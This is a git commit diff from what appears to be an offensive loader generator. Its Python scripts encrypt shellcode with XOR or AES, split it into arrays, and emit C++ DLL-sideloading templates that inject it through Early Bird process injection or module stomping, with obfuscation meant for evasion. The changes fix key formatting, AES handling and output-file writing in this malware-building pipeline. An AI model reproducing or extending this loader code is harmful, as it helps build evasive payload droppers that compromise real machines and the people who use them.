Final Changes

code splitted corrected aes corrected in the previous update
This commit is contained in:
georgesotiriadis
2023-12-16 04:45:19 +02:00
parent 8a43bd7b2b
commit 9928799c3a
8 changed files with 55 additions and 27 deletions
+18 -8
View File
@@ -1,31 +1,41 @@
#pip install crypto, pycryptodome
import sys
#For Linux
from Cryptodome.Cipher import AES
#For Windows
#from Crypto.Cipher import AES
from secrets import token_bytes
from binascii import unhexlify
import hashlib
import random
import hashlib
import binascii
#keyAES = token_bytes(16)
key = ''.join([chr(random.randint(0, 255)) for i in range(16)])
keyAES = ''.join(['\\x' + hex(ord(x))[2:].zfill(2) for x in key])
keyAES = token_bytes(16)
def encryptAES(plaintext,keyAES):
def returnKey(keyAES):
hex_values = [f'0x{byte:02x}' for byte in keyAES]
keyAES = '{' + ', '.join(hex_values) + '}'
return keyAES
def encryptAES(plaintext, keyAES):
def pad(s):
padding_length = AES.block_size - len(s) % AES.block_size
padding = bytes([padding_length] * padding_length)
return s + padding
def aesenc(plaintext, keyAES):
k = hashlib.sha256(keyAES.encode()).digest()
k = hashlib.sha256(keyAES).digest()
iv = bytes(16)
cipher = AES.new(k, AES.MODE_CBC, iv)
ciphertext = cipher.encrypt(pad(plaintext))
hex_values = [f'0x{byte:02x}' for byte in ciphertext]
ciphertext = '{' + ', '.join(hex_values) + '};'
return ciphertext
ciphertext = aesenc(plaintext, keyAES)
return str(ciphertext)
+2 -3
View File
@@ -1,7 +1,7 @@
def ChosenEncryption(encryption_type,xor_func):
aes = f"""
int AESDec(char* size, unsigned int size_len, char* encryptionKey, size_t keySize) {{
int AESDec(char* size, unsigned int size_len, char* encryptionKey, size_t keySize) {{
HCRYPTPROV hHash;
HCRYPTHASH hHaHash;
HCRYPTKEY hencryptionKey;
@@ -29,7 +29,6 @@ def ChosenEncryption(encryption_type,xor_func):
return 0;
}}
"""
xor=f"""
@@ -49,4 +48,4 @@ def ChosenEncryption(encryption_type,xor_func):
if encryption_type == "AES":
return aes
else:
return xor
return xor
+4 -1
View File
@@ -2,7 +2,6 @@ import random
from Templates.Split_Xor_Shellcode import split_xor_shellcode
# generate random 4 byte key
key = ''.join([chr(random.randint(0, 255)) for i in range(4)])
key_hex = ''.join(['\\x' + hex(ord(x))[2:].zfill(2) for x in key])
#xor oeperation function
def DoXor(data, key):
@@ -17,3 +16,7 @@ def DoXor(data, key):
return output_str
def keyHex(key):
key_hex = ''.join(['\\x' + hex(ord(x))[2:].zfill(2) for x in key])
return key_hex
+2 -2
View File
@@ -6,10 +6,10 @@ from Evasion.Obfuscator import obfuscator
def EarlyBird(shellcode_var,ciphertext_split,process_to_inject,xor_func,key_var,key_hex,encryption_type,array,size):
EarlyBird_Injection=f"""
if (!executed)
{{
executed = TRUE;
LPVOID allocation_start;
@@ -19,7 +19,7 @@ def EarlyBird(shellcode_var,ciphertext_split,process_to_inject,xor_func,key_var,
allocation_start = nullptr;
char {key_var}[] = "{key_hex}";
char {key_var}[] = {key_hex};
STARTUPINFOA si = {{ 0 }};
PROCESS_INFORMATION pi = {{ 0 }};
+1 -1
View File
@@ -1,7 +1,6 @@
import secrets
from Injection.EarlyBird_Injection import EarlyBird
from Injection.Module_Stomping import ModuleStomping
from Encryption.Choose_Encryption import ChosenEncryption
from Evasion.Obfuscator import obfuscator
@@ -189,3 +188,4 @@ def template(file_contents,xor_func,shellcode_var,ciphertext_split,key_var,key_h
}}
"""
return c_template
+17 -12
View File
@@ -2,12 +2,12 @@ import random
import os
from Dll_Names.Dlls import dll_names
from Encryption.Xor import DoXor,key,key_hex
from Templates.Split_Xor_Shellcode import split_xor_shellcode
from Encryption.Xor import DoXor,key,keyHex
from Templates.Split_Xor_Shellcode import split_xor_shellcode,split_aes_shellcode
from Templates.C_Template import template
from Templates.Arguments import parse_arguments
from Templates.Shellcode import EncryptedShellcode
from Encryption.AES import encryptAES,keyAES
from Encryption.AES import encryptAES,keyAES,returnKey
from Evasion.Obfuscator import obfuscatorArray,obfuscatorSize
@@ -53,27 +53,32 @@ def Controller():
if encryption_type == "XOR":
ciphertext = DoXor(plaintext, key)
ciphertext_split = split_xor_shellcode(ciphertext)
c_template=template(file_contents,xor_func,shellcode_var,ciphertext_split,key_var,key_hex,process_to_inject,time,injection,encryption_type,timeArray,sizeArray)
key_hex = keyHex(key)
shellcode=EncryptedShellcode(shellcode_var, ciphertext_split)
key_hex = f'''"{key_hex}"'''
c_template=template(file_contents,xor_func,shellcode_var,ciphertext_split,key_var,key_hex,process_to_inject,time,injection,encryption_type,timeArray,sizeArray)
elif encryption_type == "AES":
ciphertext = encryptAES(plaintext,keyAES)
ciphertext_split = split_xor_shellcode(ciphertext)
c_template=template(file_contents,xor_func,shellcode_var,ciphertext_split,key_var,keyAES,process_to_inject,time,injection,encryption_type,timeArray,sizeArray)
ciphertext_split = split_aes_shellcode(ciphertext)
keyAES2 = returnKey(keyAES)
shellcode=EncryptedShellcode(shellcode_var, ciphertext_split)
key_hex = f'''{{keyAES2}}'''
c_template=template(file_contents,xor_func,shellcode_var,ciphertext_split,key_var,keyAES2,process_to_inject,time,injection,encryption_type,timeArray,sizeArray)
# Create the output folder if it doesn't exist
if not os.path.exists(output_folder):
os.makedirs(output_folder)
# Generate output file path
output_filename = os.path.join(output_folder, "main.cpp")
output_shellcode=os.path.join(output_folder,"code.h")
# Write encoded shellcode to output file
output_code =os.path.join(output_folder, "code.h")
# Write encoded shellcode to output file and copy the contents to the main file
with open(output_filename, "w") as f:
f.write(c_template)
with open(output_shellcode,"w") as f:
with open(output_code, "w") as f:
f.write(shellcode)
print("Create a new visual studio project and copy the files located at " + output_folder + " Folder \n")
print("DLL SIDELOADING Template has been saved to: " + output_filename)
print("Shellcode Template has been saved to: " + output_shellcode)
print("Template has been saved to: " + output_filename)
print("Obfuscated code has been saved to: " + output_code)
+1
View File
@@ -4,6 +4,7 @@ def EncryptedShellcode(shellcode_var,ciphertext_split):
shellcode = f"""
#pragma once
unsigned char {shellcode_var}[] = {ciphertext_split}
"""
return shellcode
+10
View File
@@ -12,3 +12,13 @@ def split_xor_shellcode(ciphertext):
return ciphertext_split
def split_aes_shellcode(ciphertext):
ciphertext_split = ''
lines = [ciphertext[i:i+60] for i in range(0, len(ciphertext), 60)]
# Join the lines with newline characters to create the final result
ciphertext_split = '\n'.join(lines)
return ciphertext_split